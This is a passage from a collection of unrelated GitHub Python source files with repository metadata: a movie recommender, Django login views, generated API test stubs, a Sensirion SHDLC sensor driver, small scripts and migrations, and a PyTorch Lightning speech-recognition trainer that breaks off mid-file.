    """Return the Pearson correlation of two persons' ratings in ``dataset``.

    Only items rated by both persons contribute; 0 is returned when they
    share no rated items or when the denominator degenerates.
    """
    # To get both rated items
    both_rated = {}
    for item in dataset[person1]:
        if item in dataset[person2]:
            both_rated[item] = 1
    number_of_ratings = len(both_rated)
    # Checking for number of ratings in common
    if number_of_ratings == 0:
        return 0
    # Add up all the preferences of each user
    person1_preferences_sum = sum([dataset[person1][item] for item in both_rated])
    person2_preferences_sum = sum([dataset[person2][item] for item in both_rated])
    # Sum up the squares of preferences of each user
    person1_square_preferences_sum = sum([pow(dataset[person1][item],2) for item in both_rated])
    person2_square_preferences_sum = sum([pow(dataset[person2][item],2) for item in both_rated])
    # Sum up the product value of both preferences for each item
    product_sum_of_both_users = sum([dataset[person1][item] * dataset[person2][item] for item in both_rated])
    # Calculate the pearson score
    # Standard sample formula: covariance over the product of the
    # standard deviations (both scaled by number_of_ratings).
    numerator_value = product_sum_of_both_users - (person1_preferences_sum*person2_preferences_sum/number_of_ratings)
    denominator_value = sqrt((person1_square_preferences_sum - pow(person1_preferences_sum,2)/number_of_ratings) * (person2_square_preferences_sum -pow(person2_preferences_sum,2)/number_of_ratings))
    if denominator_value == 0:
        return 0
    else:
        r = numerator_value/denominator_value
        return r
def most_similar_users(person,number_of_users):
    """Return the ``number_of_users`` persons most similar to ``person``.

    Each entry is a (pearson_score, other_person) tuple, best score first.
    """
    scores = [(pearson_correlation(person, candidate), candidate)
              for candidate in dataset if candidate != person]
    # Highest correlation first; the name component makes tuples distinct,
    # so descending sort is equivalent to ascending sort plus reverse.
    scores.sort(reverse=True)
    return scores[:number_of_users]
def user_reommendations(person):
    """Return item recommendations for ``person``, best first.

    Uses a similarity-weighted average of the other users' ratings for
    items ``person`` has not rated yet.  (Function name -- including its
    typo -- is kept because external callers use it.)
    """
    # Gets recommendations for a person by using a weighted average of every other user's rankings
    totals = {}
    simSums = {}
    for other in dataset:
        # don't compare me to myself
        if other == person:
            continue
        sim = pearson_correlation(person,other)
        #print ">>>>>>>",sim
        # ignore scores of zero or lower
        if sim <=0:
            continue
        for item in dataset[other]:
            # only score movies i haven't seen yet
            if item not in dataset[person] or dataset[person][item] == 0:
                # Similrity * score
                totals.setdefault(item,0)
                totals[item] += dataset[other][item]* sim
                # sum of similarities
                simSums.setdefault(item,0)
                simSums[item]+= sim
    # Create the normalized list
    # Weighted average = accumulated (rating * similarity) / total similarity.
    rankings = [(total/simSums[item],item) for item,total in totals.items()]
    rankings.sort()
    rankings.reverse()
    # returns the recommended items
    recommendataions_list = [recommend_item for score,recommend_item in rankings]
    return recommendataions_list
# Demo: print Toby's five most similar users and his recommendations.
print(most_similar_users('Toby',5))
print(user_reommendations('Toby'))
"ehdwlsdnwls@naver.com"
] | ehdwlsdnwls@naver.com |
7260139647985caede41928b35165251d428ceab | d6e7364579d78b5d0ba3145394234f304adfd17c | /login_app/views.py | a17109285a1774da3ded4fcd1d9413121a37ee66 | [] | no_license | jassami/Dojo_Read | 6a5291c712d921ef876dd3a6bc49380392e5093a | 7badf51e4d53b350a86473c021efca0057e7a177 | refs/heads/main | 2023-06-02T07:21:20.612034 | 2021-06-19T15:15:48 | 2021-06-19T15:15:48 | 378,441,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,943 | py | from django.shortcuts import redirect, render
from .models import User
from django.contrib import messages
import bcrypt
def index(request):
    # Landing page with the login / registration forms.
    return render(request, 'index.html')
def register(request):
    """
    Validate the registration form, create the user with a bcrypt-hashed
    password, establish the session and redirect to /books.  On
    validation errors, flash the messages and redirect home.
    """
    errors = User.objects.register_validator(request.POST)
    request.session['send']= "register"
    if errors:
        for k, v in errors.items():
            messages.error(request, v)
        return redirect('/')
    else:
        request.session['alias']= request.POST['alias']
        pw_hash= bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()
        # Bug fix: removed the debug print of the password hash -- secrets
        # (even hashed) must not be written to server logs.
        user= User.objects.create(name= request.POST['name'], alias=request.POST['alias'], birthday= request.POST['birthday'], email= request.POST['email'], password= pw_hash)
        request.session['user_id'] = user.id
        request.session['send'] = "registered"
        return redirect('/books')
def login(request):
    """
    Authenticate a user: validate the form, look the user up by email,
    check the bcrypt password and establish the session on success.
    Every failure path redirects back to the index page.
    """
    if request.method == "POST":
        errors = User.objects.login_validator(request.POST)
        request.session['send']= "login"
        if errors:
            for k, v in errors.items():
                messages.error(request, v)
            return redirect('/')
        else:
            log_user= User.objects.filter(email=request.POST['email'])
            if len(log_user) != 1:
                return redirect('/')
            user= log_user[0]
            request.session['alias'] = user.alias
            if bcrypt.checkpw(request.POST['password'].encode(), user.password.encode()):
                # Bug fix: removed print(request.POST), which leaked the
                # plaintext password into the server logs.
                request.session['user_id']= user.id
                request.session['send'] = "logged in"
                return redirect('/books')
            # Bug fix: a wrong password previously fell off the end of the
            # function (view returned None -> Django server error).
            return redirect('/')
    else:
        return redirect('/')
def success(request):
    # Simple post-login success page.
    return render(request, 'success.html')
def logout(request):
    # Drop all session data (user_id, alias, ...) and return home.
    request.session.clear()
    return redirect('/')
| [
"jassami1@hotmail.com"
] | jassami1@hotmail.com |
48c663aa2a5710c161b3eb746a960ff8252ec051 | 709b1549033c9a547c67ee507fdc10b7e5d234ad | /test/test_worker_pools_api.py | a9689158dab784197bf9245cf0d64ca7dd1eb230 | [
"Apache-2.0"
] | permissive | cvent/octopus-deploy-api-client | d622417286b348c0be29678a86005a809c77c005 | 0e03e842e1beb29b132776aee077df570b88366a | refs/heads/master | 2020-12-05T14:17:46.229979 | 2020-01-07T05:06:58 | 2020-01-07T05:06:58 | 232,135,963 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,971 | py | # coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import octopus_deploy_swagger_client
from octopus_deploy_client.worker_pools_api import WorkerPoolsApi # noqa: E501
from octopus_deploy_swagger_client.rest import ApiException
class TestWorkerPoolsApi(unittest.TestCase):
    """WorkerPoolsApi unit test stubs"""

    def setUp(self):
        # Bug fix: instantiate the WorkerPoolsApi class imported at the top
        # of this module; the previous expression referenced the
        # inconsistently generated ``octopus_deploy_client`` package path.
        self.api = WorkerPoolsApi()  # noqa: E501

    def tearDown(self):
        pass

    def test_create_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
        """Test case for create_response_descriptor_worker_pools_worker_pool_worker_pool_resource

        Create a WorkerPoolResource  # noqa: E501
        """
        pass

    def test_create_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
        """Test case for create_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces

        Create a WorkerPoolResource  # noqa: E501
        """
        pass

    def test_custom_action_response_descriptor_octopus_server_web_api_actions_sort_worker_pools_responder(self):
        """Test case for custom_action_response_descriptor_octopus_server_web_api_actions_sort_worker_pools_responder

        """
        pass

    def test_custom_action_response_descriptor_octopus_server_web_api_actions_sort_worker_pools_responder_spaces(self):
        """Test case for custom_action_response_descriptor_octopus_server_web_api_actions_sort_worker_pools_responder_spaces

        """
        pass

    def test_custom_query_response_descriptor_octopus_server_web_api_actions_infrastructure_summary_worker_pools_summary_responder(self):
        """Test case for custom_query_response_descriptor_octopus_server_web_api_actions_infrastructure_summary_worker_pools_summary_responder

        """
        pass

    def test_custom_query_response_descriptor_octopus_server_web_api_actions_infrastructure_summary_worker_pools_summary_responder_spaces(self):
        """Test case for custom_query_response_descriptor_octopus_server_web_api_actions_infrastructure_summary_worker_pools_summary_responder_spaces

        """
        pass

    def test_custom_query_response_descriptor_octopus_server_web_api_actions_worker_pools_workers_responder(self):
        """Test case for custom_query_response_descriptor_octopus_server_web_api_actions_worker_pools_workers_responder

        """
        pass

    def test_custom_query_response_descriptor_octopus_server_web_api_actions_worker_pools_workers_responder_spaces(self):
        """Test case for custom_query_response_descriptor_octopus_server_web_api_actions_worker_pools_workers_responder_spaces

        """
        pass

    def test_delete_on_background_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
        """Test case for delete_on_background_response_descriptor_worker_pools_worker_pool_worker_pool_resource

        Delete a WorkerPoolResource by ID  # noqa: E501
        """
        pass

    def test_delete_on_background_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
        """Test case for delete_on_background_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces

        Delete a WorkerPoolResource by ID  # noqa: E501
        """
        pass

    def test_index_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
        """Test case for index_response_descriptor_worker_pools_worker_pool_worker_pool_resource

        Get a list of WorkerPoolResources  # noqa: E501
        """
        pass

    def test_index_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
        """Test case for index_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces

        Get a list of WorkerPoolResources  # noqa: E501
        """
        pass

    def test_list_all_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
        """Test case for list_all_response_descriptor_worker_pools_worker_pool_worker_pool_resource

        Get a list of WorkerPoolResources  # noqa: E501
        """
        pass

    def test_list_all_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
        """Test case for list_all_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces

        Get a list of WorkerPoolResources  # noqa: E501
        """
        pass

    def test_load_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
        """Test case for load_response_descriptor_worker_pools_worker_pool_worker_pool_resource

        Get a WorkerPoolResource by ID  # noqa: E501
        """
        pass

    def test_load_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
        """Test case for load_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces

        Get a WorkerPoolResource by ID  # noqa: E501
        """
        pass

    def test_modify_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
        """Test case for modify_response_descriptor_worker_pools_worker_pool_worker_pool_resource

        Modify a WorkerPoolResource by ID  # noqa: E501
        """
        pass

    def test_modify_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
        """Test case for modify_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces

        Modify a WorkerPoolResource by ID  # noqa: E501
        """
        pass
# Allow running this test module directly with the stdlib runner.
if __name__ == '__main__':
    unittest.main()
| [
"d.jain@cvent.com"
] | d.jain@cvent.com |
dd65e49ac4e5d72ad391c44fe86fbec7470da58a | 754f71f70dfd6a22944d8d872c6d2f1d6983ac14 | /sensirion_shdlc_driver/device.py | 26dc53bb4e13555ba24e995327b14f5e2a84b6c7 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | Sensirion/python-shdlc-driver | 052685da8db5629fa5929da65000210db82358e7 | 31e9683c27004ee05edf89996d656bc50f5bdb3a | refs/heads/master | 2021-06-10T10:35:47.299481 | 2021-03-19T08:47:12 | 2021-03-19T08:47:12 | 144,961,065 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,213 | py | # -*- coding: utf-8 -*-
# (c) Copyright 2019 Sensirion AG, Switzerland
from __future__ import absolute_import, division, print_function
from .device_base import ShdlcDeviceBase
from .commands.device_info import ShdlcCmdGetProductType, \
ShdlcCmdGetProductName, ShdlcCmdGetArticleCode, ShdlcCmdGetSerialNumber, \
ShdlcCmdGetProductSubType
from .commands.device_version import ShdlcCmdGetVersion
from .commands.error_state import ShdlcCmdGetErrorState
from .commands.device_reset import ShdlcCmdDeviceReset
from .commands.slave_address import ShdlcCmdGetSlaveAddress, \
ShdlcCmdSetSlaveAddress
from .commands.baudrate import ShdlcCmdGetBaudrate, ShdlcCmdSetBaudrate
from .commands.reply_delay import ShdlcCmdGetReplyDelay, ShdlcCmdSetReplyDelay
from .commands.system_up_time import ShdlcCmdGetSystemUpTime
from .commands.factory_reset import ShdlcCmdFactoryReset
import logging
log = logging.getLogger(__name__)
class ShdlcDevice(ShdlcDeviceBase):
"""
Generic SHDLC device, providing only common SHDLC commands. This class is
intended only to communicate with devices which do not provide a
corresponding device driver (yet). With this class you can for example
read the serial number of a device even if no device specific driver
exists. But if there exists a device specific driver, you should always
use it instead of this driver.
This is a low-level driver which just provides all SHDLC commands as Python
methods. Typically, calling a method sends one SHDLC request to the device
and interprets its response. There is no higher level functionality
available, please look for other drivers if you need a higher level
interface.
There is no (or very few) caching functionality in this driver. For example
if you call
:py:meth:`~sensirion_shdlc_driver.device.ShdlcDevice.get_serial_number()`
100 times, it will send the command 100 times over the SHDLC interface to
the device. This makes the driver (nearly) stateless.
"""
    def __init__(self, connection, slave_address):
        """
        Create an SHDLC device instance on an SHDLC connection.

        .. note:: This constructor does not communicate with the device, so
                  it's possible to instantiate an object even if the device is
                  not connected or powered yet.

        :param ~sensirion_shdlc_driver.connection.ShdlcConnection connection:
            The connection used for the communication.
        :param byte slave_address:
            The address of the device.
        """
        # All connection/address state handling lives in the base class;
        # this subclass only adds the generic SHDLC commands.
        super(ShdlcDevice, self).__init__(connection, slave_address)
def get_product_type(self, as_int=False):
"""
Get the product type. The product type (sometimes also called "device
type") can be used to detect what kind of SHDLC product is connected.
:param bool as_int: If ``True``, the product type is returned as an
integer, otherwise as a string of hexadecimal
digits (default).
:return: The product type as an integer or string of hexadecimal
digits.
:rtype: string/int
"""
product_type = self.execute(ShdlcCmdGetProductType())
if as_int:
product_type = int(product_type, 16)
return product_type
def get_product_subtype(self):
"""
Get the product subtype. Some product types exist in multiple slightly
different variants, this command allows to determine the exact variant
of the connected device. Sometimes this is called "device subtype".
.. note:: This command is not supported by every product type.
:return: The product subtype as a byte (the interpretation depends on
the connected product type).
:rtype: byte
"""
return self.execute(ShdlcCmdGetProductSubType())
def get_product_name(self):
"""
Get the product name of the device.
.. note:: This command is not supported by every product type.
:return: The product name as an ASCII string.
:rtype: string
"""
return self.execute(ShdlcCmdGetProductName())
def get_article_code(self):
"""
Get the article code of the device.
.. note:: This command is not supported by every product type.
:return: The article code as an ASCII string.
:rtype: string
"""
return self.execute(ShdlcCmdGetArticleCode())
def get_serial_number(self):
"""
Get the serial number of the device.
:return: The serial number as an ASCII string.
:rtype: string
"""
return self.execute(ShdlcCmdGetSerialNumber())
def get_version(self):
"""
Get the version of the device firmware, hardware and SHDLC protocol.
:return: The device version as a Version object.
:rtype: Version
"""
return self.execute(ShdlcCmdGetVersion())
def get_error_state(self, clear=True, as_exception=False):
"""
Get and optionally clear the device error state and the last error. The
state and error code interpretation depends on the connected device
type.
:param bool clear:
If ``True``, the error state on the device gets cleared.
:param bool as_exception:
If ``True``, the error state is returned as an
:py:class:`~sensirion_shdlc_driver.errors.ShdlcDeviceError`
object instead of a byte.
:return: The device state as a 32-bit unsigned integer containing all
error flags, and the last error which occurred on the device.
If ``as_exception`` is ``True``, it's returned as an
:py:class:`~sensirion_shdlc_driver.errors.ShdlcDeviceError`
object or ``None``, otherwise as a byte.
:rtype: int, byte/ShdlcDeviceError/None
"""
state, error = self.execute(ShdlcCmdGetErrorState(clear=clear))
if as_exception:
error = self._get_device_error(error)
return state, error
def get_slave_address(self):
"""
Get the SHDLC slave address of the device.
.. note:: See also the property
:py:attr:`~sensirion_shdlc_driver.device.ShdlcDevice.slave_address`
which returns the device's slave address without sending a
command. This method really sends a command to the device,
even though the slave address is actually already known by
this object.
:return: The slave address of the device.
:rtype: byte
"""
return self.execute(ShdlcCmdGetSlaveAddress())
def set_slave_address(self, slave_address, update_driver=True):
"""
Set the SHDLC slave address of the device.
.. note:: The slave address is stored in non-volatile memory of the
device and thus persists after a device reset. So the next
time connecting to the device, you have to use the new
address.
.. warning:: When changing the address of a slave, make sure there
isn't already a slave with that address on the same bus!
In that case you would get communication issues which can
only be fixed by disconnecting one of the slaves.
:param byte slave_address:
The new slave address [0..254]. The address 255 is reserved for
broadcasts.
:param bool update_driver:
If ``True``, the property
:py:attr:`~sensirion_shdlc_driver.device.ShdlcDevice.slave_address`
of this object is also updated with the new address. This is
needed to allow further communication with the device, as its
address has changed.
"""
self.execute(ShdlcCmdSetSlaveAddress(slave_address))
if update_driver:
self._slave_address = slave_address
def get_baudrate(self):
"""
Get the SHDLC baudrate of the device.
.. note:: This method really sends a command to the device, even though
the baudrate is already known by the used
:py:class:`~sensirion_shdlc_driver.port.ShdlcPort` object.
:return: The baudrate of the device [bit/s].
:rtype: int
"""
return self.execute(ShdlcCmdGetBaudrate())
def set_baudrate(self, baudrate, update_driver=True):
"""
Set the SHDLC baudrate of the device.
.. note:: The baudrate is stored in non-volatile memory of the
device and thus persists after a device reset. So the next
time connecting to the device, you have to use the new
baudrate.
.. warning:: If you pass ``True`` to the argument ``update_driver``,
the baudrate of the underlaying
:py:class:`~sensirion_shdlc_driver.port.ShdlcPort` object
is changed. As the baudrate applies to the whole bus (with
all its slaves), you might no longer be able to
communicate with other slaves. Generally you should change
the baudrate of all slaves consecutively, and only set
``update_driver`` to ``True`` the last time.
:param int baudrate:
The new baudrate. See device documentation for a list of supported
baudrates. Many devices support the baudrates 9600, 19200 and
115200.
:param bool update_driver:
If true, the baudrate of the
:py:class:`~sensirion_shdlc_driver.port.ShdlcPort` object is also
updated with the baudrate. This is needed to allow further
communication with the device, as its baudrate has changed.
"""
self.execute(ShdlcCmdSetBaudrate(baudrate))
if update_driver:
self._connection.port.bitrate = baudrate
def get_reply_delay(self):
"""
Get the SHDLC reply delay of the device.
See
:py:meth:`~sensirion_shdlc_driver.device.ShdlcDevice.set_reply_delay()`
for details.
:return: The reply delay of the device [μs].
:rtype: byte
"""
return self.execute(ShdlcCmdGetReplyDelay())
def set_reply_delay(self, reply_delay):
"""
Set the SHDLC reply delay of the device.
The reply delay allows to increase the minimum response time of the
slave to a given value in Microseconds. This is needed for RS485
masters which require some time to switch from sending to receiving.
If the slave starts sending the response while the master is still
driving the bus lines, a conflict on the bus occurs and communication
fails. If you use such a slow RS485 master, you can increase the reply
delay of all slaves to avoid this issue.
:param byte reply_delay: The new reply delay [μs].
"""
self.execute(ShdlcCmdSetReplyDelay(reply_delay))
def get_system_up_time(self):
"""
Get the system up time of the device.
:return: The time since the last power-on or device reset [s].
:rtype: int
"""
return self.execute(ShdlcCmdGetSystemUpTime())
def device_reset(self):
"""
Execute a device reset (reboot firmware, similar to power cycle).
"""
self.execute(ShdlcCmdDeviceReset())
def factory_reset(self):
"""
Perform a factory reset (restore the off-the-shelf factory
configuration).
.. warning:: This resets any configuration done after leaving the
factory! Keep in mind that this command might also change
communication parameters (i.e. baudrate and slave address)
and thus you might have to adjust the driver's parameters
to allow further communication with the device.
"""
self.execute(ShdlcCmdFactoryReset())
| [
"urban.bruhin@sensirion.com"
] | urban.bruhin@sensirion.com |
669c553556fcd1474367708fd07b8c0349995ccb | 6343f0081768a991fc5f55e85d8cbddfb9cd3eaa | /Gallows/venv/Scripts/pip3-script.py | 90f5f2f48ef520827b49dc65fa6816310bbe8aca | [] | no_license | EXALLENGE/Belous_task_2 | a3ef2cfd65c23d6c066d2f11105c2c143e6a8723 | 06c9a6263656c6525af4ca21d0e923389fa977bb | refs/heads/master | 2020-04-23T23:13:45.677818 | 2019-02-20T15:35:35 | 2019-02-20T15:35:35 | 171,528,666 | 0 | 0 | null | null | null | null | WINDOWS-1251 | Python | false | false | 425 | py | #!C:\Users\Миша\PycharmProjects\Belous_task_2\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
| [
"mike.belous@gmail.com"
] | mike.belous@gmail.com |
76dfc65104ff5fc6446594836bf678bf7c297bbc | 93164624d55f22b7da35f993bfbfcdd615495f6c | /platobot/platobot/bin/workers_dispatcher.py | 3f2ad1f6efd9314e98ec58265e6fedaaa9a1bc3e | [] | no_license | Opportunity-Hack-San-Jose-2017/Team7 | 315b4aa7697d9267d5d62ce30312c257f2f1b0ae | f06c07c7b25e76d1f8dbd8d4dcab3b038bb2f84b | refs/heads/master | 2021-10-11T07:15:12.402531 | 2019-01-23T05:26:30 | 2019-01-23T05:26:30 | 108,605,849 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | from platobot.workers.manager import Manager
if __name__ == "__main__":
manager = Manager(1, 'Chatty')
manager.start()
| [
"yijoydai@gmail.com"
] | yijoydai@gmail.com |
f984d94c574fa9dc474db91ff900636f282e36bb | 5b9a5dc92ac4eef05e4d9cae7a29c2c88f2a1a64 | /backend/users/migrations/0003_auto_20190616_0937.py | 9998585206e807df9ba125565f7651e077094df7 | [] | no_license | yawnlon/Xueqing | be8ba0c28e0e5359a74ffa33b620d9fd1cf018e6 | cbbf9e23569744a32d6f35c6f8a8e65136836e80 | refs/heads/master | 2023-07-05T16:15:19.098910 | 2021-08-27T02:32:50 | 2021-08-27T02:32:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 2.2.1 on 2019-06-16 09:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0002_smscode'),
]
operations = [
migrations.AlterField(
model_name='smscode',
name='mobile',
field=models.CharField(error_messages={'unique': 'A user with that mobile number already exists.'}, max_length=11, unique=True, verbose_name='手机号'),
),
]
| [
"wuboyangyawn@hotmail.com"
] | wuboyangyawn@hotmail.com |
e307d6950e0d0a9b0ad0b5918da3c94c91bd5e50 | 557d52dfb2116f453483d1ecdae0e3410683f75a | /swappy/src/swap/investors/migrations/0001_initial.py | 737322bc2868cec27df987c61c1c4993e119066d | [] | no_license | scvalencia/swap | 30ac975e8dc82da20ac4433f36ddec6d129e5f08 | 40d1817f2ed8b32c9318fad44d6fde36447ae0e6 | refs/heads/master | 2020-04-06T08:10:23.812831 | 2014-12-22T05:52:06 | 2014-12-22T05:52:06 | 24,610,170 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Follow',
fields=[
],
options={
'unique_together': set([('follower_login', 'following_login')]),
'db_table': 'follows',
'managed': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Investor',
fields=[
],
options={
'db_table': 'investors',
'managed': False,
},
bases=(models.Model,),
),
]
| [
"jcbages@outlook.com"
] | jcbages@outlook.com |
d3d8c71c3ff21b36b1fd9039631553b991a09fbd | 2117f0fc0005957b5b9a8eead9e17bbec5edd02e | /shortbot.py | 1a4c5a512db992c12a67b949155c13d2f07dd6b3 | [] | no_license | tim35050/shortbot | 44cdc2fd39ea402aaf38543e8635c7e0e08b0476 | 30c292814589c63779423818172bacb3e451cafb | refs/heads/master | 2021-01-18T05:06:06.483252 | 2013-12-13T06:38:58 | 2013-12-13T06:38:58 | 15,033,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,410 | py | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
print "hello"
# <codecell>
import re
import random
#from nltk import compat
class Chat(object):
def __init__(self, pairs, reflections={}):
"""
Initialize the chatbot. Pairs is a list of patterns and responses. Each
pattern is a regular expression matching the user's statement or question,
e.g. r'I like (.*)'. For each such pattern a list of possible responses
is given, e.g. ['Why do you like %1', 'Did you ever dislike %1']. Material
which is matched by parenthesized sections of the patterns (e.g. .*) is mapped to
the numbered positions in the responses, e.g. %1.
:type pairs: list of tuple
:param pairs: The patterns and responses
:type reflections: dict
:param reflections: A mapping between first and second person expressions
:rtype: None
"""
self._pairs = [(re.compile(x, re.IGNORECASE),y) for (x,y) in pairs]
#self._topics = topics
self._reflections = reflections
self._regex = self._compile_reflections()
def _compile_reflections(self):
sorted_refl = sorted(self._reflections.keys(), key=len,
reverse=True)
return re.compile(r"\b({0})\b".format("|".join(map(re.escape,
sorted_refl))), re.IGNORECASE)
def _substitute(self, str):
"""
Substitute words in the string, according to the specified reflections,
e.g. "I'm" -> "you are"
:type str: str
:param str: The string to be mapped
:rtype: str
"""
#print str
return self._regex.sub(lambda mo:
self._reflections[mo.string[mo.start():mo.end()]],
str.lower())
def _wildcards(self, response, match):
pos = response.find('%')
while pos >= 0:
num = int(response[pos+1:pos+2])
replacement = self._substitute(match.group(num))
print "response:",self._substitute(match.group(num))
response = response[:pos] + \
replacement + \
response[pos+2:]
pos = response.find('%')
return response
def respond(self, str):
"""
Generate a response to the user input.
:type str: str
:param str: The string to be mapped
:rtype: str
"""
# check each pattern
for (pattern, response) in self._pairs:
match = pattern.match(str)
# did the pattern match?
if match:
resp = random.choice(response) # pick a random response
resp = self._wildcards(resp, match) # process wildcards
# fix munged punctuation at the end
if resp[-2:] == '?.': resp = resp[:-2] + '.'
if resp[-2:] == '??': resp = resp[:-2] + '?'
return resp
# Hold a conversation with a chatbot
def converse(self, quit="quit"):
input = ""
while input != quit:
input = quit
try: input = raw_input(">")
except EOFError:
print(input)
if input:
while input[-1] in "!.": input = input[:-1]
print(self.respond(input))
# <codecell>
reflections = {
"i am" : "you are",
"i was" : "you were",
"i" : "you",
"i'm" : "you are",
"i'd" : "you would",
"i've" : "you have",
"i'll" : "you will",
"my" : "your",
"you are" : "I am",
"you were" : "I was",
"you've" : "I have",
"you'll" : "I will",
"your" : "my",
"yours" : "mine",
"you" : "me",
"me" : "you"
}
pairs = (
# suggestions
(r'Hello.*',
( "Hey what's up??Which URL can i shorten for u?",
"Need help with URL shortening?")),
(r".*(http://.*)",
( "URL you have entered is %1",
"I don't know your short URL")),
# anything else
(r'(.*)',
( "(Looking soulfully) treat please...",
"Did you say 'Let's go for a walk?'",
"Yes! Yes! Nap time!",
)
)
)
if __name__ == "__main__":
print "Hi..I am your shortbot."
print "Please enter the URL in the form of http://UrlToBeShortened"
short = Chat(pairs, reflections)
short.converse()
# <codecell>
| [
"siddhartha@berkeley.edu"
] | siddhartha@berkeley.edu |
572f08f2106e213faddc56d75d42ca523cc209fe | c7b3f765302d4737ae8bc6e3973bce900d0a93cd | /speechrecognition/neuralnet/train.py | 114bfce52e4cd09b2cceb92b610dc1db5f94447b | [
"Apache-2.0"
] | permissive | rishiraj/heychinki | 0033fc0d1ba92e325244216bc986d332b3d497c3 | 413e8fbf2b7b4b1c041575ab17a43b12bade4b00 | refs/heads/main | 2023-08-23T10:36:52.050510 | 2021-10-08T20:58:06 | 2021-10-08T20:58:06 | 411,438,402 | 1 | 0 | Apache-2.0 | 2021-10-01T11:16:14 | 2021-09-28T21:05:54 | Python | UTF-8 | Python | false | false | 7,087 | py | import os
import ast
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning import Trainer
from argparse import ArgumentParser
from model import SpeechRecognition
from dataset import Data, collate_fn_padd
from pytorch_lightning.loggers import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint
class SpeechModule(LightningModule):
def __init__(self, model, args):
super(SpeechModule, self).__init__()
self.model = model
self.criterion = nn.CTCLoss(blank=28, zero_infinity=True)
self.args = args
def forward(self, x, hidden):
return self.model(x, hidden)
def configure_optimizers(self):
self.optimizer = optim.AdamW(self.model.parameters(), self.args.learning_rate)
self.scheduler = optim.lr_scheduler.ReduceLROnPlateau(
self.optimizer, mode='min',
factor=0.50, patience=6)
return [self.optimizer], [self.scheduler]
def step(self, batch):
spectrograms, labels, input_lengths, label_lengths = batch
bs = spectrograms.shape[0]
hidden = self.model._init_hidden(bs)
hn, c0 = hidden[0].to(self.device), hidden[1].to(self.device)
output, _ = self(spectrograms, (hn, c0))
output = F.log_softmax(output, dim=2)
loss = self.criterion(output, labels, input_lengths, label_lengths)
return loss
def training_step(self, batch, batch_idx):
loss = self.step(batch)
logs = {'loss': loss, 'lr': self.optimizer.param_groups[0]['lr'] }
return {'loss': loss, 'log': logs}
def train_dataloader(self):
d_params = Data.parameters
d_params.update(self.args.dparams_override)
train_dataset = Data(json_path=self.args.train_file, **d_params)
return DataLoader(dataset=train_dataset,
batch_size=self.args.batch_size,
num_workers=self.args.data_workers,
pin_memory=True,
collate_fn=collate_fn_padd)
def validation_step(self, batch, batch_idx):
loss = self.step(batch)
return {'val_loss': loss}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()
self.scheduler.step(avg_loss)
tensorboard_logs = {'val_loss': avg_loss}
return {'val_loss': avg_loss, 'log': tensorboard_logs}
def val_dataloader(self):
d_params = Data.parameters
d_params.update(self.args.dparams_override)
test_dataset = Data(json_path=self.args.valid_file, **d_params, valid=True)
return DataLoader(dataset=test_dataset,
batch_size=self.args.batch_size,
num_workers=self.args.data_workers,
collate_fn=collate_fn_padd,
pin_memory=True)
def checkpoint_callback(args):
return ModelCheckpoint(
filepath=args.save_model_path,
save_top_k=True,
verbose=True,
monitor='val_loss',
mode='min',
prefix=''
)
def main(args):
h_params = SpeechRecognition.hyper_parameters
h_params.update(args.hparams_override)
model = SpeechRecognition(**h_params)
if args.load_model_from:
speech_module = SpeechModule.load_from_checkpoint(args.load_model_from, model=model, args=args)
else:
speech_module = SpeechModule(model, args)
logger = TensorBoardLogger(args.logdir, name='speech_recognition')
trainer = Trainer(logger=logger)
trainer = Trainer(
max_epochs=args.epochs, gpus=args.gpus,
num_nodes=args.nodes, distributed_backend=None,
